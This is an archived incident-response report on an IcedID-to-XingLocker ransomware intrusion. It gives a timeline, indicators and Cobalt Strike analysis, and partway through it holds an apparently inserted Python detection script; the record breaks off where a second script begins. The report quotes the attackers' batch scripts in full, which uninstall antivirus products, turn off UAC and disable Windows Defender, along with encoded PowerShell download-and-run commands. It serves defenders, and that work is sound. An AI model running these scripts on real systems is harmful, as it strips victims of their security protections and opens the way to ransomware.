{
	"id": "61cc7272-377d-4d5c-91d3-6397180c420d",
	"created_at": "2026-04-06T00:14:41.730945Z",
	"updated_at": "2026-04-10T03:24:24.575301Z",
	"deleted_at": null,
	"sha1_hash": "9c516fb58cb70db768fb119f3823c4b83909ac0a",
	"title": "IcedID to XingLocker Ransomware in 24 hours",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2559614,
	"plain_text": "IcedID to XingLocker Ransomware in 24 hours\r\nBy editor\r\nPublished: 2021-10-18 · Archived: 2026-04-05 22:34:03 UTC\r\nIntro\r\nTowards the end of July, we observed an intrusion that began with IcedID malware and ended in XingLocker ransomware, a\r\nMountlocker variant. XingLocker made its first appearance in early May of this year. The new group was featured in the\r\nAstroLocker ransomware blog, and it has been very active since then.\r\nIn this intrusion, we observed the threat actors use multiple DLL Beacons that would call out to different Cobalt Strike C2\r\nchannels. It appears that operators used different payloads, to accomplish different tasks, on each phase of the intrusion. The\r\nthreat actors used batch scripts during the intrusion for a number of purposes, primarily to disable antivirus programs and\r\nexecute payloads.\r\nCase Summary\r\nThis case started with an IcedID infection from a malware campaign as reported by Myrtus. As with most commodity\r\nmalware we see, IcedID executes the initial discovery commands and then exfiltrates the results via the C2 channel. If threat\r\nactors find the organization to be of interest, they will launch the next phase. In some cases, there might be different threat\r\nactor groups working on different phases of the attack. In this instance, the threat actors instructed IcedID to download and\r\nexecute the next stage malware two hours after the initial compromise. The payload was a Cobalt Strike Beacon in the form\r\nof a DLL.\r\nUpon initial execution, Cobalt Strike ran some discovery commands before injecting into the LSASS process to steal cached\r\ncredentials. The threat actors did not waste any time, and within four minutes, they gained administrative credentials then\r\nbegan searching for the domain controllers. 
Once the domain controllers were identified, they used Cobalt Strike’s “jump psexec_psh” capability, which creates a Windows service that executes a Beacon executable to move laterally. Having gained access to the domain controllers, the attackers downloaded and executed AdFind to collect further information about the domain.\r\nThe attackers preferred to script various parts of the intrusion via batch scripts. They had a script for persistence, defense evasion and execution tasks. A complete list of those scripts came from hxxps://styservice[.]com, as we shared with the community in this tweet thread. The first batch script we saw scheduled a task which would execute a command to load a Cobalt Strike Beacon into memory using regsvr32. This persistence mechanism was only seen on the domain controllers and one other critical server.\r\nThe lateral movement and execution of batch scripts continued with the operators expanding their network footprint. It is worth mentioning that it appears they chose which hosts to pivot to by assessing the importance implied by their hostnames. After landing on an “important” host, the first task was to execute various batch scripts to disable antivirus programs. On one host, common backup utilities were also disabled.\r\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\r\nPage 1 of 24\n\nThree hours into the intrusion, the attackers had deployed Beacons across various hosts on the network. Even so, they deployed another Beacon using a PowerShell loader method, this time on the beachhead. They used this Beacon to run PowerView’s Invoke-ShareFinder module in an effort to discover potentially interesting directories and files. BloodHound was also executed as part of their reconnaissance activities. At the same time, the operators performed an exhaustive port scan on the servers they had earlier identified to be “important”. 
Minutes away from meeting their final objective, the operators manually searched for files and directories of interest for the second time.\r\nAround 23 hours after the initial intrusion, the threat actors moved towards their final objective of deploying XingLocker ransomware. The deployment took place via wmic and batch scripts. We did not observe any overt exfiltration of data; however, it is possible that the threat actors used Cobalt Strike to transmit sensitive data.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, Metasploit, Empire, PoshC2, BazarLoader, etc. More information on this service and others can be found here.\r\nThe Cobalt Strike servers in this case were added to the Threat Feed on 7/19, 7/26 and 7/27.\r\nWe also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs including Sysmon, Kape packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nAnalysis and reporting completed by @kostastsale and @0xtornado\r\nReviewed by @RoxpinTeddy\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nThe IcedID infection came as a result of a phishing campaign as reported by Myrtus on Twitter.\r\nThe initial IcedID sample was executed on the beachhead using regsvr32.exe.\r\nAutomated analysis of this IcedID sample extracts the following configuration for the staging server:\r\n{\r\n \"Campaign ID\": 1394912167,\r\n \"C2 url\": \"feedbackfileweb.club\"}\r\nIcedID core analysis shows additional C2 infrastructure as per this sample:\r\ngsterangsic.buzz\r\noscanonamik.club\r\nriderskop.top\r\niserunifish.club\r\nExecution\r\nUpon the execution of the IcedID sample, we observed the download and execution of a 
malicious DLL ikaqkk.dll:\r\nBelow is a screenshot of the packet where we can spot the GZIPLOADER downloading the first stage from the C2:\r\nA detailed GZIPLOADER analysis from Binary Defense is available here.\r\nThe DLL was then executed using rundll32.exe one second later:\r\nrundll32.exe \"C:\\Users\\REDACTED\\AppData\\Local\\REDACTED\\ikaqkk.dll\",update /i:\"TimberMule\\license.dat\"\r\nA Cobalt Strike Beacon was downloaded and loaded into DLLHost.exe via process hollowing a few hours after the initial IcedID execution:\r\nThe threat actors connected to the machine to run the first discovery commands using the Cobalt Strike Beacon. The threat actors then downloaded an additional Cobalt Strike Beacon, kaslose.dll, via curl and executed it via regsvr32:\r\nThe threat actors also executed an HTA and a PowerShell loader to load a Cobalt Strike Beacon into memory on the beachhead:\r\nPersistence\r\nIcedID Persistence\r\nUpon IcedID execution, a scheduled task named {3D0CCC72-D85D-7A63-8C0A-66CF5BAFD686} was created. The task was scheduled to execute every hour:\r\nThe new scheduled task was registered under EID 106 as seen below. 
(EIDs: 106,200,201 “Microsoft-Windows-TaskScheduler\\Operational.evtx”)\r\nCorrelating this with process execution logs from MDE shows that the task was executing the DLL downloaded by IcedID:\r\nCobalt Strike Persistence\r\nWhile analyzing this intrusion, we observed further persistence via scheduled tasks associated with post-exploitation activities.\r\nA scheduled task named HpSupport executed a Cobalt Strike Beacon, kaslose64.dll, on both the Domain Controller and the File Server:\r\nOn the File Server, the same scheduled task was created with a slightly different name:\r\nThe star.bat script contained the following lines in both cases:\r\n!echo OFF\r\nregsvr32 C:\\users\\public\\music\\kaslose64.dll\r\nDefense Evasion\r\nProcess Injection: Process Hollowing\r\nIcedID reached out to 37.120.222[.]100:8080 to download and load a Cobalt Strike Beacon via the process hollowing technique:\r\nKilling multiple Services and Disabling Security Tools\r\nThe threat actors executed a 1698-line batch script, kasper.bat, on a file server, which kills multiple processes using taskkill, stops/disables several services using net stop and sc config, and disables a number of security tools using WMI.\r\nHere is an extract from the kasper.bat script:\r\nstart wmic product where name=\"Webroot SecureAnywhere\" call uninstall /nointeractive\r\nstart wmic product where name=\"Symantec Endpoint Protection\" call uninstall /nointeractive\r\nstart wmic product where name=\"AVG 2015\" call uninstall /nointeractive\r\nstart wmic product where name=\"McAfee VirusScan Enterprise\" call uninstall /nointeractive\r\nstart wmic product where name=\"McAfee Agent\" call uninstall /nointeractive\r\nstart wmic product where name=\"McAfee DLP Endpoint\" call uninstall /nointeractive\r\nstart wmic 
product where name=\"McAfee Endpoint Security Platform\" call uninstall /nointeractive\r\nstart wmic product where name=\"McAfee Endpoint Security Threat Prevention\" call uninstall /nointeractive\r\nstart wmic product where name=\"Microsoft Security Client\" call uninstall /nointeractive\r\nstart wmic product where name=\"Malwarebytes' Managed Client\" call uninstall /nointeractive\r\nstart wmic product where name=\"Sophos System Protection\" call uninstall /nointeractive\r\nstart wmic product where name=\"Sophos AutoUpdate\" call uninstall /nointeractive\r\nstart wmic product where name=\"Sophos Remote Management System\" call uninstall /nointeractive\r\nstart wmic product where name=\"McAfee SiteAdvisor Enterprise\" call uninstall /nointeractive\r\nstart wmic product where name=\"Symantec Backup Exec Remote Agent for Windows\" call uninstall /nointeractive\r\nstart wmic product where name=\"ESET File Security\" call uninstall /nointeractive\r\nreg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f\r\npowershell.exe Set-MpPreference -DisableRealtimeMonitoring $true\r\npowershell.exe Uninstall-WindowsFeature -Name Windows-Defender\r\nDisabling Windows Defender using multiple techniques\r\nThe threat actors executed three other scripts named fed1.bat , fed2.bat and fed3.bat using PowerShell and\r\nmanipulating several registry keys to disable Windows Defender.\r\nContent of fed1.bat script:\r\n@echo off\r\npowershell.exe Set-MpPreference -DisableRealtimeMonitoring $true\r\npowershell.exe Uninstall-WindowsFeature -Name Windows-Defender\r\nREG ADD \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD /d 1 /f\r\nrem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!\r\nrem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference\r\nrem To also disable Windows Defender Security Center include this\r\nrem reg add 
\"HKLM\\System\\CurrentControlSet\\Services\\SecurityHealthService\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nrem 1 - Disable Real-time protection\r\nreg delete \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiSpyware\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine\" /v \"MpEnablePus\" /t REG_DWORD /d \"0\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableBehaviorMonitoring\" /t REG_DWO\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableIOAVProtection\" /t REG_DWORD /\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableOnAccessProtection\" /t REG_DWO\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableRealtimeMonitoring\" /t REG_DWO\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableScanOnRealtimeEnable\" /t REG_D\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v \"DisableEnhancedNotifications\" /t REG_DWORD /d \"1\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"DisableBlockAtFirstSeen\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\" /t REG_DWORD /d \"0\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SubmitSamplesConsent\" /t REG_DWORD /d \"0\" /f\r\nContent of fed2.bat script:\r\n@echo off\r\nrem 0 - Disable Logging\r\nreg add \"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderApiLogger\" /v \"Start\" /t REG_DWORD /d \"0\" /f\r\nreg add 
\"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderAuditLogger\" /v \"Start\" /t REG_DWORD /d \"0\" /f\r\nrem Disable WD Tasks\r\nschtasks /Change /TN \"Microsoft\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh\" /Disable\r\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Cache Maintenance\" /Disable\r\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Cleanup\" /Disable\r\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan\" /Disable\r\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Verification\" /Disable\r\nrem Disable WD systray icon\r\nreg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run\" /v \"Windows Defender\" /f\r\nreg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"Windows Defender\" /f\r\nreg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"WindowsDefender\" /f\r\nrem Remove WD context menu\r\nreg delete \"HKCR\\*\\shellex\\ContextMenuHandlers\\EPP\" /f\r\nreg delete \"HKCR\\Directory\\shellex\\ContextMenuHandlers\\EPP\" /f\r\nreg delete \"HKCR\\Drive\\shellex\\ContextMenuHandlers\\EPP\" /f\r\nrem Disable WD services\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WdBoot\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WdFilter\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WdNisDrv\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WdNisSvc\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WinDefend\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\SecurityHealthService\" /v 
\"Start\" /t REG_DWORD /d \"4\" /f\r\nrem Run \"Disable WD.bat\" again to disable WD services\r\nREG ADD \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD /d 1 /f\r\nContent of fed3.bat script:\r\n@echo off\r\nrem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!\r\nrem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference\r\nrem To also disable Windows Defender Security Center include this\r\nrem reg add \"HKLM\\System\\CurrentControlSet\\Services\\SecurityHealthService\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nrem 1 - Disable Real-time protection\r\nreg delete \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiSpyware\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine\" /v \"MpEnablePus\" /t REG_DWORD /d \"0\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableBehaviorMonitoring\" /t REG_DWO\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableIOAVProtection\" /t REG_DWORD /\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableOnAccessProtection\" /t REG_DWO\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableRealtimeMonitoring\" /t REG_DWO\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableScanOnRealtimeEnable\" /t REG_D\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v \"DisableEnhancedNotifications\" /t REG_DWORD /d \"1\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"DisableBlockAtFirstSeen\" /t 
REG_DWORD /d \"1\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\" /t REG_DWORD /d \"0\" /f\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SubmitSamplesConsent\" /t REG_DWORD /d \"0\" /f\r\nrem 0 - Disable Logging\r\nreg add \"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderApiLogger\" /v \"Start\" /t REG_DWORD /d \"0\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderAuditLogger\" /v \"Start\" /t REG_DWORD /d \"0\" /f\r\nrem Disable WD Tasks\r\nschtasks /Change /TN \"Microsoft\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh\" /Disable\r\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Cache Maintenance\" /Disable\r\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Cleanup\" /Disable\r\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan\" /Disable\r\nschtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Verification\" /Disable\r\nrem Disable WD systray icon\r\nreg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run\" /v \"Windows Defender\" /f\r\nreg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"Windows Defender\" /f\r\nreg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"WindowsDefender\" /f\r\nrem Remove WD context menu\r\nreg delete \"HKCR\\*\\shellex\\ContextMenuHandlers\\EPP\" /f\r\nreg delete \"HKCR\\Directory\\shellex\\ContextMenuHandlers\\EPP\" /f\r\nreg delete \"HKCR\\Drive\\shellex\\ContextMenuHandlers\\EPP\" /f\r\nrem Disable WD services\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WdBoot\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WdFilter\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add 
\"HKLM\\System\\CurrentControlSet\\Services\\WdNisDrv\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WdNisSvc\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\WinDefend\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nreg add \"HKLM\\System\\CurrentControlSet\\Services\\SecurityHealthService\" /v \"Start\" /t REG_DWORD /d \"4\" /f\r\nrem Run \"Disable WD.bat\" again to disable WD services\r\nThe contents of these three scripts appear to have been lifted from the first revision of quick-disable-windows-defender.bat on GitHub: fed1.bat is one half of that batch file, fed2.bat is the other half, and fed3.bat is a complete copy. This tells us that the threat actor was not aware of what was in these scripts, or else they would not have run fed1/fed2 and fed3, which do the same thing.\r\nCredential Access\r\nThe threat actors injected into a high-privileged process and then accessed cached credentials from LSASS:\r\nRelated named pipe activity, matching Cobalt Strike’s patterns for running the Mimikatz pass-the-hash function to execute local and remote commands. 
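The pipe patterns and the Defender tampering commands shown above are cheap to hunt for in Sysmon (EID 1 process creation, EID 17/18 pipe events) or in MDE process telemetry. What follows is an added example written for this report, not code from The DFIR Report, Sysmon or Cobalt Strike: it runs a handful of string and regex rules over constructed sample events whose command lines are copied from kasper.bat and fed1-3.bat above, plus the status_f5 pipe from the psexec_psh loader. The hostnames and the event dict layout are assumptions. The Cobalt Strike pipe names are the defaults listed in public detection rules (msagent_##, MSSE-####-server, postex_####, status_##, mojo.*); operators change them with a custom Malleable C2 profile, so a miss on the pipe rule is not a clean bill of health.

```python
import re

# Default Cobalt Strike pipe names as they appear in public detection rules.
# Sysmon EID 17/18 log the name relative to the pipe root (PipeName: \\status_f5),
# so matching is done after leading backslashes are stripped.
CS_PIPE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    '^status_[0-9a-f]{2}$',               # psexec_psh / SMB stager (status_f5 in this case)
    '^msagent_[0-9a-f]{2}$',              # SMB Beacon
    '^postex_[0-9a-f]{4}$',               # post-exploitation jobs
    '^MSSE-[0-9]{1,5}-server$',           # older post-exploitation default
    '^mojo[.][0-9]+[.][0-9]+[.][0-9]+$',  # older SMB stager default
)]

DEFENDER_SERVICES = ('windefend', 'wdfilter', 'wdboot', 'wdnisdrv', 'wdnissvc',
                     'securityhealthservice')
DEFENDER_POLICY_VALUES = ('disableantispyware', 'disableantivirus',
                          'disablerealtimemonitoring', 'disablebehaviormonitoring',
                          'disableioavprotection', 'disableonaccessprotection')

# Each predicate takes the lower-cased command line.
def _reg_defender_policy(c):
    return ('reg' in c and 'policies\\microsoft\\windows defender' in c
            and any(v in c for v in DEFENDER_POLICY_VALUES))

def _reg_defender_service(c):
    # Start=4 (SERVICE_DISABLED) written straight to the service key.
    return ('currentcontrolset\\services\\' in c
            and any(s in c for s in DEFENDER_SERVICES)
            and re.search('/d +\"?4\"?', c) is not None)

def _defender_tasks(c):
    return 'schtasks' in c and '/disable' in c and 'windows defender' in c

def _defender_etw(c):
    # Autologger Start=0 silences the Defender ETW providers.
    return 'autologger\\defender' in c and re.search('/d +\"?0\"?', c) is not None

def _powershell_tamper(c):
    return (('set-mppreference' in c and '-disable' in c)
            or ('uninstall-windowsfeature' in c and 'windows-defender' in c))

def _wmi_product_uninstall(c):
    return 'wmic' in c and 'product' in c and 'call uninstall' in c

def _uac_off(c):
    return 'enablelua' in c and re.search('/d +\"?0\"?', c) is not None

CMDLINE_RULES = (
    ('defender_policy_disabled', _reg_defender_policy),
    ('defender_service_start_disabled', _reg_defender_service),
    ('defender_tasks_disabled', _defender_tasks),
    ('defender_etw_logging_disabled', _defender_etw),
    ('defender_powershell_tamper', _powershell_tamper),
    ('security_product_wmi_uninstall', _wmi_product_uninstall),
    ('uac_disabled', _uac_off),
)

def classify_cmdline(cmdline):
    c = cmdline.lower()
    return [name for name, pred in CMDLINE_RULES if pred(c)]

def classify_pipe(pipe_name):
    base = pipe_name.lstrip('\\\\')
    return ['cobaltstrike_default_pipe'] if any(p.match(base) for p in CS_PIPE_PATTERNS) else []

def hunt(events):
    '''Return (host, rule, evidence) for every event that trips a rule.'''
    hits = []
    for ev in events:
        if ev['type'] == 'process':
            hits += [(ev['host'], r, ev['cmdline']) for r in classify_cmdline(ev['cmdline'])]
        elif ev['type'] == 'pipe':
            hits += [(ev['host'], r, ev['pipe']) for r in classify_pipe(ev['pipe'])]
    return hits

# Constructed sample telemetry: hostnames are made up, command lines are taken from the scripts above.
SAMPLE_EVENTS = [
    {'host': 'FS01', 'type': 'process', 'cmdline': 'reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiSpyware\" /t REG_DWORD /d \"1\" /f'},
    {'host': 'FS01', 'type': 'process', 'cmdline': 'reg add \"HKLM\\System\\CurrentControlSet\\Services\\WinDefend\" /v \"Start\" /t REG_DWORD /d \"4\" /f'},
    {'host': 'FS01', 'type': 'process', 'cmdline': 'schtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan\" /Disable'},
    {'host': 'FS01', 'type': 'process', 'cmdline': 'start wmic product where name=\"Symantec Endpoint Protection\" call uninstall /nointeractive'},
    {'host': 'FS01', 'type': 'process', 'cmdline': 'powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true'},
    {'host': 'FS01', 'type': 'process', 'cmdline': 'reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f'},
    {'host': 'DC01', 'type': 'pipe', 'pipe': '\\status_f5'},
    {'host': 'WS07', 'type': 'pipe', 'pipe': '\\PSHost.2f3a.9c1.DefaultAppDomain.powershell'},   # benign
    {'host': 'WS07', 'type': 'process', 'cmdline': 'reg query \"HKLM\\Software\\Microsoft\\Windows Defender\" /v ProductStatus'},  # benign
]

if __name__ == '__main__':
    for host, rule, evidence in hunt(SAMPLE_EVENTS):
        print(host, rule, evidence, sep=' | ')
```

On the sample input the seven malicious events each trip exactly one rule and the two benign ones trip none. With Tamper Protection enabled, the registry and Set-MpPreference changes themselves are blocked, but the attempt still lands in process telemetry, which is what these rules key on; a policy or service hit from anything other than your own management tooling deserves an immediate look.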
That named pipe carried the results back to the Beacon process.\r\nWindows EID: 4673 – A privileged service was called:\r\nDiscovery\r\nIcedID initial Environment Discovery\r\nSeveral discovery commands were executed by IcedID after the initial execution:\r\nipconfig /all\r\ncmd.exe /c chcp \u003e\u00262\r\nWMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\r\nsysteminfo\r\nnet config workstation\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nnet view /all /domain\r\nnet view /all\r\nnet group \"Domain Admins\" /domain\r\nCobalt Strike Beacon Discovery\r\nCobalt Strike’s appino Beacon ran discovery commands upon initial execution:\r\ncmd.exe /C ping -n 1\u003credacted\u003e\r\ncmd.exe /C ping -n 1 \u003credacted\u003e\r\ncmd.exe /C nltest /domain_trusts\u0026nltest /dclist:\u0026c:\\windows\\sysnative\\nltest /domain_trusts\u0026c:\\windows\\sysnative\\nltest /d\r\ncmd.exe /C netstat -a -n -p tcp | find \"ESTAB\"\r\ncmd.exe /C net group \"domain Admins\" /DOMAIN\r\ncmd.exe /C net group \"Domain Computers\" /DOMAIN\r\ncmd.exe /C ipconfig /all\r\nActive Directory Domain Discovery\r\nDiscovering domain controllers prior to pivoting:\r\nAfter discovering and pivoting to the Domain Controller, the threat actors used both AdFind and BloodHound to explore the Active Directory domain.\r\nExecuting AdFind on the Domain Controller:\r\nEvidence of BloodHound execution on the Domain Controller:\r\nThe threat actors also executed the PowerView Invoke-ShareFinder module on the beachhead host:\r\npowershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0\r\nDecoded command:\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:10966/'); Invoke-ShareFinder -CheckShareAccess\r\nThe threat actors also executed the PowerView 
Invoke-FindLocalAdminAccess module on one of the compromised servers:\r\npowershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0\r\nDecoded command:\r\nIEX (New-Object Net.Webclient).DownloadString('http://localhost:37923/'); Invoke-FindLocalAdminAccess -threads 50\r\nWe also saw exhaustive port scans of certain servers before additional discovery.\r\nFile and Directory Discovery\r\nThe following discovery commands were run on all hosts including the Domain Controllers:\r\nLateral Movement\r\nThe first lateral movement to the Domain Controller was performed using remote service creation (executing spoolsv.exe via remote services):\r\nThe spoolsv.exe binary is a Cobalt Strike artifact used for lateral movement and C2, which decodes to the configuration below:\r\n{\r\n \"BeaconType\": [\r\n \"HTTPS\"\r\n ],\r\n \"Port\": 443,\r\n \"SleepTime\": 4000,\r\n \"MaxGetSize\": 1403644,\r\n \"Jitter\": 37,\r\n \"C2Server\": \"kaslose.com,/jquery-3.3.1.min.js\",\r\n \"HttpPostUri\": \"/jquery-3.3.2.min.js\",\r\n \"Malleable_C2_Instructions\": [\r\n \"Remove 1522 bytes from the end\",\r\n \"Remove 84 bytes from the beginning\",\r\n \"Remove 3931 bytes from the beginning\",\r\n \"Base64 URL-safe decode\",\r\n \"XOR mask w/ random key\"\r\n ],\r\n \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"HttpGet_Verb\": \"GET\",\r\n \"HttpPost_Verb\": \"POST\",\r\n \"HttpPostChunk\": 0,\r\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n \"CryptoScheme\": 0,\r\n \"Proxy_Behavior\": \"Use IE settings\",\r\n \"Watermark\": 0,\r\n \"bStageCleanup\": \"True\",\r\n \"bCFGCaution\": \"False\",\r\n \"KillDate\": 0,\r\n \"bProcInject_StartRWX\": 
\"False\",\r\n \"bProcInject_UseRWX\": \"False\",\r\n \"bProcInject_MinAllocSize\": 17500,\r\n \"ProcInject_PrependAppend_x86\": [\r\n \"kJA=\",\r\n \"Empty\"\r\n ],\r\n \"ProcInject_PrependAppend_x64\": [\r\n \"kJA=\",\r\n \"Empty\"\r\n ],\r\n \"ProcInject_Execute\": [\r\n \"ntdll:RtlUserThreadStart\",\r\n \"CreateThread\",\r\n \"NtQueueApcThread-s\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"ProcInject_AllocationMethod\": \"NtMapViewOfSection\",\r\n \"bUsesCookies\": \"True\",\r\n \"HostHeader\": \"\"}\r\nAn additional lateral movement technique was observed, where the threat actors used Cobalt Strike’s jump psexec_psh:\r\nUsing CyberChef (recipe), we decoded the obfuscated PowerShell loader, which uses the default named pipe \\\\.\\pipe\\status_f5:\r\nThe threat actors also pivoted to a domain controller by using the same Cobalt Strike artifact, spoolsv.exe, via remote service creation:\r\nRight after the initial lateral movement, a second Cobalt Strike Beacon, kaslose64.dll, was executed on a critical server.\r\nCommand and Control\r\nRITA stands for Real Intelligence Threat Analytics and is developed by Active Countermeasures. RITA is a framework for identifying command and control communication, also known as beaconing. As the name implies, beaconing refers to delivering regular messages from an infected host to an attacker-controlled host. A Beacon is the malware agent installed on the victim’s device and is responsible for communicating with the C2 server. 
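To make the beaconing idea concrete, here is an added example written for this report (it is not RITA code, and it leaves out the data-size and connection-count terms RITA also uses) that scores the regularity of connection start times with the two interval statistics RITA documents: Bowley skewness and median absolute deviation of the gaps between connections. It simulates a Beacon with the kaslose.com settings from the config above (SleepTime 4000 ms, Jitter 37; Cobalt Strike applies jitter by shortening each sleep by a random 0..jitter percent) against a constructed Poisson-style browsing pattern with the same average gap. Both traffic samples are generated inside the script, not taken from the case, and the scoring formula is an assumed simplification.

```python
import random
import statistics

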